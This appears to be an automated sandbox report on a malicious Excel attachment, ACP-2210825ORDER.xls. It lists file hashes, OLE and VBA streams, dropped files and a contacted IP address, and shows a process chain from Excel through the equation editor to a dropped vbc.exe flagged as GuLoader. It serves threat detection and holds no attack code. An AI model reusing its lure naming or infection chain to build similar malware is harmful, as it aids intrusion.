      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
      MD5:831E92F84F915D931EE02260D16AC145
      SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
      SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
      SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):321644
      Entropy (8bit):2.239527826723405
      Encrypted:false
      SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
      MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
      SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
      SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
      SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2754571047715912
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
      MD5:38A09794AE082E08EA4F8B6E517F4814
      SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
      SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
      SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2724443756862973
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
      MD5:831E92F84F915D931EE02260D16AC145
      SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
      SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
      SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
      Malicious:false
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):11776
      Entropy (8bit):5.656065698421856
      Encrypted:false
      SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
      MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
      SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
      SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
      SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
      Category:dropped
      Size (bytes):1130496
      Entropy (8bit):7.090671625727551
      Encrypted:false
      SSDEEP:24576:mLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXzmZr5XXXXXXXXXXXXUXXXXXXXSXXXd:Ch
      MD5:0E013B64C85479178FE144D0F1AB7C4B
      SHA1:D05316B326B2DA075C00246DE6E3CBFB8B255A96
      SHA-256:CAB79276FB8419A70BAAC774C9DB91D16ED1DADF5F5624C4148E7F1975FDFF94
      SHA-512:34699E3C80C5F5E95C876D5794E05701C1726E04A46AF9976CB6415551688B97F39DFC78556F4F7A0588B4E24111663F7BAC1D188E80F256BAE5821BAFCCE5B0
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):178824
      Entropy (8bit):6.515135274289935
      Encrypted:false
      SSDEEP:1536:Aqnh3ZWvlivpBh2LolEVEF+F2MVQ454gp3cHE6xBiP29vpAX5D57DwVaDXW:RkYzh2Lol/FdUJNfPgk5DVDUd
      MD5:52F571D999E9DD5B6ABFFE0CC9BF8DF3
      SHA1:67743CD31368EA4C7C350C5071A6B1D8A5AF400B
      SHA-256:7CC58916DBEADFF389E9375FD1F8973DB606156E953F309C55C40384E54765E3
      SHA-512:0BA04B8CDA196099229824B65348B71483D50377D10660AF8CD70A10919A310D88DDBA80D1F595524F71764BB2A765C87B9E5E2276391B11A272A52E3BBA7C11
      Malicious:false
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):119298
      Entropy (8bit):7.998253263209972
      Encrypted:true
      SSDEEP:1536:6JcdhM4/003cKP7zr9UE0q19q9MUxJ0O1mwVrLSft3KeDQMjE4le/l1NUYeECfZm:LdhM4/Fpb/1Ca2LEt9DQMA4lGVUh14B
      MD5:251C92F85825E5BBBE4D7624FC7F4AE4
      SHA1:BF396458B8D37DCC5880B29A7482A4896828C35F
      SHA-256:20694D441EEAB696B6D6AE5B7785BB0CAD19E1708EF49C28737CAD1805B49CDC
      SHA-512:5730DF53CE6DE9791F81287EA340ECDECEF1B99B80DC7501F9739083AF5D66543795E82C19388522580A43B8553FEAA2D5C0B419502BC7325E34F1862BBD44DD
      Malicious:false
      Process:C:\Users\Public\vbc.exe
      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
      Category:dropped
      Size (bytes):131991
      Entropy (8bit):5.8780987492725405
      Encrypted:false
      SSDEEP:1536:v6J1cdTEl2OzvUtevCuoCW9fPr+vo9F5J7YWv3vbRnBycYWOGWSeaGymtYWOGWSS:VdW2OLgNCwXKSH8WPvVBjA+KE8S5
      MD5:10D998CF80B4437C2979B25EBCBE16D1
      SHA1:79C99DD2ABB99253E41C5E40DAB29522F93345BB
      SHA-256:A0A87BC30F4B39D7B642841A10208CE5286C6CA712B28B9D921E1EA6F547AEE6
      SHA-512:44863645B48815C3C248111F86440E3A0C515AF61B5A17D15B5A6C7304277F76056BCEB6C579E7824E11ADCA4DB3E385FA8019D602C40FA527E725C09B6AA523
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):477800
      Entropy (8bit):7.505402259729816
      Encrypted:false
      SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
      MD5:7081C4822CF1C7572DD82822B8F27C49
      SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
      SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
      SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
      Malicious:true
      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
      Entropy (8bit):7.090542873047565
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:ACP-2210825ORDER.xls
      File size:1130496
      MD5:6c84860292e2a4d210396b7012be9b8a
      SHA1:7061c26320bf8836b55ac660860fa0937ae8f48e
      SHA256:cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
      SHA512:dbeb30f6ec918e82c13ed2aea4f14eeba7a38252fda3ebba49b63b0840a529b026cb36c40927b69d95970fe83c0b09c957a5b918d124eff97bfeaf3cda77a426
      SSDEEP:24576:XLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXpmSr5XXXXXXXXXXXXUXXXXXXXSXXXZ:sh
      TLSH:1135BE347893CE36D9A586347BA6D5B103037C733E548A5722C3732E1AF334265D6EAA
      Icon Hash:e4eea286a4b4bcb4
      Document Type:OLE
      Number of OLE Files:1
      Has Summary Info:
      Application Name:Microsoft Excel
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:True
      Code Page:1252
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2022-11-29 05:27:07
      Creating Application:
      Security:1
      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:786432
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977

      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977

      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977

      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985

      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977

      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977

      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977

      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985

      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:200
      Entropy:3.268293668191049
      Base64 Encoded:False
      General
      Stream Path:MBD017EF320/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      General
      Stream Path:MBD017EF320/Package
      File Type:Microsoft Excel 2007+
      Stream Size:11564
      Entropy:7.132901381496351
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      General
      Stream Path:MBD017EF321/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560418312417174
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      General
      Stream Path:MBD017EF321/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.683490359133683
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:520
      Entropy:5.18674908320575
      Base64 Encoded:True
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:104
      Entropy:3.0488640812019017
      Base64 Encoded:False
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:2615
      Entropy:3.966034925838034
      Base64 Encoded:False
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:553
      Entropy:6.393413723460345
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      General
      Stream Path:MBD017EF322/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560271435258422
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      General
      Stream Path:MBD017EF322/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.683500296443008
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:524
      Entropy:5.18268582383174
      Base64 Encoded:True
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:104
      Entropy:3.0488640812019017
      Base64 Encoded:False
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:2615
      Entropy:3.966034925838034
      Base64 Encoded:False
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:553
      Entropy:6.393413723460345
      Base64 Encoded:True
      General
      Stream Path:MBD017EF323/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      General
      Stream Path:MBD017EF323/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      General
      Stream Path:MBD017EF323/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560400140271791
      Base64 Encoded:True
      General
      Stream Path:MBD017EF323/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      General
      Stream Path:MBD017EF323/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      General
      Stream Path:MBD017EF323/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.6835052184911135
      Base64 Encoded:True
      • 172.245.34.91


      Target ID:0
      Start time:08:12:24
      Start date:29/11/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13f8d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:08:12:45
      Start date:29/11/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:5
      Start time:08:12:50
      Start date:29/11/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:477800 bytes
      MD5 hash:7081C4822CF1C7572DD82822B8F27C49
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low

      No disassembly